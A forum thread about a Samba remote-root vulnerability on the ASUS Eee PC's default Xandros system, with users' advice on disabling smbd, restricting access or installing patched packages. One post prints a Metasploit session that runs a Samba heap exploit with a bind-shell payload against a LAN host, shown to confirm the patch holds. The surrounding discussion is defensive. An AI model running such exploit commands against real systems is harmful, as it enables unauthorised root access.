9 replies to this topic

[jss]

"The first thing we did when we put our hands at the ASUS Eee PC was to test its security. The ASUS Eee PC comes with a customized version of Xandros operating system installed, and some other bundled software like Mozilla Firefox, Pidgin, Skype and OpenOffice.org.

Analysing the running processes of the ASUS Eee PC, the first thing that caught our attention was the running smbd process (the sshd daemon was started by us, and is not enabled by default)."...

http://www.risesecur...g/blog/entry/6/

http://seclists.org/...8/Feb/0086.html

[ptopping]

What does this all mean? Is it good, is it bad? are we all riddled with virses and are we being hacked by intruders?

The first thing I did was install a virus checker. I have a Belkin router but haven't installed zone alarm because I thought I would try the default firewall out.

Has anyone had any problems with security with the default system?

[LS650]

Since the article doesn't actually explain itself in English, I'm going to guess that this is... bad?
It would be nice if the writer of the article or the OP could also post a brief explanation as to what this might mean.

[BCTripster]

Basically it means that if you use the default Xandros, then you enable the SMB (samba, windows network sharing) options your eeepc is susceptible to an intruder gaining root on the machine.

Essentially you'd have to be on the same wifi network as someone with this knowledge and the urge to exploit it, what they'd hope to gain is another question.

Basically you should not be leaving any sensitive information on your eeepc anyway as it is too easy a target for thieves to begin with. If security is a concern for you then you should look at installing a full blown Linux distro with the extra security that provides. The Xandros install is aimed at ease of use and it has removed some security functionalities because of that.

For most users the exploit these guys have discovered won't be an issue. Chances of seeing it in the wild used against you are quite slim.

[lagagnon]

Quote

Analysing the running processes of the ASUS Eee PC, the first thing that caught our attention was the running smbd process (the sshd daemon was started by us, and is not enabled by default)."...

smbd is run by default on many other Linux distros - it is one part of the Samba daemon for connecting Linux machines to Windows machines. You would have to REALLY know what you are doing to hack into that port. I wouldn't worry about it. You can turn off the smbd daemon. This is more scarmongering than anything. Find the location of the rc.samba or rc.smbd script and make it non-executable.

[kost]

UPGRADE YOUR SAMBA!

I built new Samba packages fixing problem above.
You need to add ftp.linux.hr repository as stated in this topic:
http://forum.eeeuser...ic.php?id=13623

Note that you need to change pinning of ftp.linux.hr repository to be higher than updates of asus/xandros (at least while asus/xandros issues the patch).
I've put 955 in priority field. E.g. - you should put:
Package: *
Pin: origin ftp.linux.hr
Pin-Priority: 955

Then issue:
sudo apt-get update
sudo apt-get upgrade

I tried to make everything compatible with other original xandros packages, so nothing should broke.

I also tried to exploit mentioned vulnerability using this security update and vulnerability is not present any more after update, look for yourself:

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|


       =[ msf v3.1-release
+ -- --=[ 265 exploits - 118 payloads
+ -- --=[ 17 encoders - 6 nops
       =[ 46 aux

msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.168.9.80
RHOST => 192.168.9.80
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux vsyscall
   1   Linux Heap Brute Force (Debian/Ubuntu)
   2   Linux Heap Brute Force (Gentoo)
   3   Linux Heap Brute Force (Mandriva)
   4   Linux Heap Brute Force (RHEL/CentOS)
   5   Linux Heap Brute Force (SUSE)
   6   Linux Heap Brute Force (Slackware)
   7   DEBUG


msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0x08352000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08361000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08370000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x0837f000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x0838e000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x0839d000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083ac000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083bb000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083ca000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083d9000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083e8000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083f7000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08406000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08415000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08424000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08433000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
msf exploit(lsa_transnames_heap) >

[Tyleeer]

disable or remove smbd if you are not required to share files with windows systems. Easy.

read here for more info http://forum.eeeuser...ic.php?id=14237

funny how people hit the panic button without understanding the whole situation. Read people READ!

knowledge is power!

[rudolf]

There is a much easier way to disable samba:
Press ctrl-alt-t for a terminal, there enter:
sudo chmod a-x /etc/init.d/samba
then press ctrl-d to exit terminal.
Reboot.

To check sucess, start terminal as aboveand enter:
ps -e and look for smbd. No smbd, no samba.

To get samba running again, do above with "a+x" instead.

I can't figure why the run samba anyway.

[Neil Darlow]

I see that the Eee has tcp-wrappers installed.

It makes sense to create an entry in /etc/hosts.allow for smbd that only permits access from your local network. This will protect you when you use the Eee away from home.

[mkrishnan]

Please use this detailed thread (which includes numerous solutions or workarounds) for further discussion.

http://forum.eeeuser...ic.php?id=14237

There's some great stuff in this thread here, but this way we can keep it all together. :)